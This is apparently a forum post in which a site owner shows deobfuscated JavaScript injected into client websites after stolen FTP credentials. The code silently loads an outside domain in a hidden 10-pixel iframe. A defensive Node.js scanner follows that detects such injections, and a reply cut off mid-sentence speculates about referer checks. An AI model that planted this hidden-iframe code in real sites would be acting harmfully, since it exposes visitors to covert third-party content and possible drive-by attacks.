I recently discovered some evil code in some of my clients' websites. These snippets were PHP-based and JS-based and were injected because a trojan virus logged some FTP credentials. However, the code was obfuscated and as I eval'd it (safely), it looks like this:
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("<iframe src='http://www.bahnmotive.de/index.htm' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src','http://www.bahnmotive.de/index.htm');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
As you can see, the URL bahnmotive.de is included in the page as an invisible iframe. This website does not contain any harmful data (at least not today anymore), so I ask myself (and you): Why would someone link to a site in an invisible iframe and not do some other evil things? My first guess is that there is an SEO agency which promised a lot of traffic on their client's website bahnmotive.de and accomplished that because of this trojan virus.
Could that be? I did some research on Google, but found nothing about this, so I wanted to ask some of the pros here. Perhaps you can point me to another forum where this topic can be discussed.
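The injected snippet above uses two forms of the same trick: a literal hidden iframe tag written with document.write, and the same iframe built via createElement. As an added example (not from the original post), here is a small Node.js scanner that flags both forms in a page's source; the 20px "tiny" threshold, the sample page and the placeholder URL are assumptions.

```javascript
// Added example (not part of the original post): a static scanner for the two
// hidden-iframe injection forms shown above. Threshold and sample are assumptions.
const HIDDEN_SIZE = 20; // an iframe at or below this many px in both dimensions is "tiny"

// Pull a single attribute value (quoted or bare) out of an iframe tag's attribute text.
function attrValue(attrs, name) {
  const m = new RegExp(name + "\\s*=\\s*['\"]?([^'\"\\s>]+)", "i").exec(attrs);
  return m ? m[1] : null;
}

// Returns [{ src, reasons }] for each iframe that is hidden or tiny. Checks both the
// literal <iframe> tag (document.write form) and the createElement('iframe') DOM form.
function scanForHiddenIframes(source) {
  const findings = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(source)) !== null) {
    const attrs = m[1];
    const reasons = [];
    if (/visibility\s*:\s*hidden|display\s*:\s*none/i.test(attrs)) reasons.push("hidden via style");
    const w = parseInt(attrValue(attrs, "width"), 10);
    const h = parseInt(attrValue(attrs, "height"), 10);
    if (w <= HIDDEN_SIZE && h <= HIDDEN_SIZE) reasons.push(`tiny ${w}x${h}`); // NaN compares false
    if (reasons.length) findings.push({ src: attrValue(attrs, "src"), reasons });
  }
  if (/createElement\(\s*['"]iframe['"]\s*\)/i.test(source)) {
    const reasons = [];
    if (/\.style\.visibility\s*=\s*['"]hidden['"]/i.test(source)) reasons.push("hidden via style");
    const w = /setAttribute\(\s*['"]width['"]\s*,\s*['"]?(\d+)/i.exec(source);
    const h = /setAttribute\(\s*['"]height['"]\s*,\s*['"]?(\d+)/i.exec(source);
    if (w && h && +w[1] <= HIDDEN_SIZE && +h[1] <= HIDDEN_SIZE) reasons.push(`tiny ${w[1]}x${h[1]}`);
    const src = /setAttribute\(\s*['"]src['"]\s*,\s*['"]([^'"]+)['"]/i.exec(source);
    if (reasons.length) findings.push({ src: src ? src[1] : null, reasons });
  }
  return findings;
}

// Constructed sample: one legitimate embed plus both branches of the injected snippet
// (URL replaced with a placeholder).
const SAMPLE_PAGE = `
<iframe src='https://video.example/embed/1' width='560' height='315'></iframe>
<script>
if (document.getElementsByTagName('body')[0]) { iframer(); } else {
document.write("<iframe src='http://injected.example/index.htm' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src','http://injected.example/index.htm');
f.style.visibility='hidden'; f.setAttribute('width','10'); f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
</script>`;

console.log(JSON.stringify(scanForHiddenIframes(SAMPLE_PAGE), null, 2));
```

Run it over a suspect file's contents; the legitimate 560x315 embed is not reported, while both injected forms are, each with its extracted src.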
It's quite possible that the webpage is sniffing HTTP_REFERER to ensure users are coming from a link in order to disguise the attack from other outside individuals. Other considerations: